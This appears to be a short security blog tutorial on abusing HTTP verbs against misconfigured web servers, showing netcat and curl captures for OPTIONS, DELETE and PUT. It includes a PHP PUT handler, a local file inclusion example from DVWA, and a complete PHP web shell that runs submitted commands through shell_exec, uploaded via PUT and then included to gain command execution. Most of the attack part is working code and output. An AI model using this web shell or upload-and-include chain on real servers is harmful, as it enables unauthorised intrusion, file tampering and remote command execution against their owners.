The HTTP protocol comprises of the following verbs or methods.
I assume you are well aware of these, you can read more about them in detail from this RFC document.
I will show some interesting HTTP verbs which can be used to break into servers. Well, these attacks can be very rare but thought of sharing 🙂
The OPTIONS verb is enabled in the server it can be used to view all the HTTP methods configured.
% nc localhost 80 OPTIONS / HTTP/1.0 HTTP/1.1 200 OK Allow: OPTIONS, TRACE, GET, HEAD, POST Server: Microsoft-IIS/7.5 Public: OPTIONS, TRACE, GET, HEAD, POST X-Powered-By: ASP.NET Date: Sun, 14 Jun 2015 05:31:10 GMT Connection: close
The DELETE verb is a dangerous verb and can be misused. If this is misconfigured, can be use to delete resources from the web server.
% nc localhost 80 DELETE /location/resource HTTP/1.0 Date: Sun, 14 Jun 2015 05:01:22 GMT Server: Apache/2.2.3 (CentOS) X-Powered-By: PHP/5.1.6 Set-Cookie: PHPSESSID=ete39c4b0uk83phvucj1ftbsn5; expires=Mon, 15 Jun 2015 05:01:22 GMT; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8
This verb can be used to upload a resource into the server. This is also a risky verb if not configured applicably. For example suppose we want to write “<?php echo ‘Hello World’; ?>” in a new file as “hello.php”. Make sure you give the correct length of your payload.
% cat -e hello.php <?php echo 'Hello World'; ?>$ % wc -m hello.php 29 hello.php % nc localhost 80 PUT /hello.php HTTP/1.0 Content-Type: text/html Content-Length: 29 <?php echo 'Hello World'; ?>
PUT verb in PHP
PHP has the support for the PUT verb. This is a sample program which will receive the data from the PUT request and save it as “myfile”.
$putdata = fopen("php://input", "r");
$fp = fopen("myfile", "w");
while ($data = fread($putdata, 1024)) fwrite($fp, $data);
I will save this as “put.php” in my root directory of the web server.
Now we can request “put.php” using the PUT verb and send our payload.
% cat -e phpinfo.php <?php phpinfo(); ?>$ % wc -m phpinfo.php 20 phpinfo.php % nc 192.168.1.5 80 PUT /put.php HTTP/1.0 Content-Type: text/html Content-Length: 20 <?php phpinfo(); ?> HTTP/1.1 200 OK Date: Mon, 15 Jun 2015 06:48:16 GMT Server: Apache/2.4.7 (Win32) OpenSSL/0.9.8y PHP/5.4.22 X-Powered-By: PHP/5.4.22 Content-Length: 0 Connection: close Content-Type: text/html
Now if you view “myfile” our payload should be nice written.
Suppose you have a local file inclusion situation, in cases like that we can include our newly written file using PUT ?
This is an example of local file inclusion. I’ll be using DVWA to demonstrate this.
echo "File included: ".$_REQUEST["page"]."<br>";
$file = $_REQUEST["page"];
Suppose we want to upload a simple web shell we can do it like the following 😉
% wc -m shell.php 189 shell.php % nc 192.168.1.5 80 PUT /put.php HTTP/1.0 Content-Type: text/html Content-Length: 189 <?php print '<form method="post"> Command: <input type="text" name="__"><br> <input type="submit"> </form>'; if(isset($_POST["__"])) print '<pre>'.shell_exec($_POST["__"]).'</pre>'; ?> HTTP/1.1 200 OK Date: Mon, 15 Jun 2015 07:39:42 GMT Server: Apache/2.4.7 (Win32) OpenSSL/0.9.8y PHP/5.4.22 X-Powered-By: PHP/5.4.22 Content-Length: 0 Connection: close Content-Type: text/html
After that include our “myfile” and you can execute commands on the server.
You can also use curl to upload a file using PUT easily.
% curl http://192.168.1.5/put.php --upload-file shell.php -v * About to connect() to 192.168.1.5 port 80 (#0) * Trying 192.168.1.5... * connected * Connected to 192.168.1.5 (192.168.1.5) port 80 (#0) > PUT /put.php HTTP/1.1 > User-Agent: curl/7.26.0 > Host: 192.168.1.5 > Accept: */* > Content-Length: 189 > Expect: 100-continue > * additional stuff not fine transfer.c:1037: 0 0 * HTTP 1.1 or later with persistent connection, pipelining supported < HTTP/1.1 100 Continue * additional stuff not fine transfer.c:1037: 0 0 * We are completely uploaded and fine * HTTP 1.1 or later with persistent connection, pipelining supported < HTTP/1.1 200 OK < Date: Mon, 15 Jun 2015 07:47:44 GMT < Server: Apache/2.4.7 (Win32) OpenSSL/0.9.8y PHP/5.4.22 < X-Powered-By: PHP/5.4.22 < Content-Length: 0 < Content-Type: text/html < * Connection #0 to host 192.168.1.5 left intact * Closing connection #0
Thanks for reading !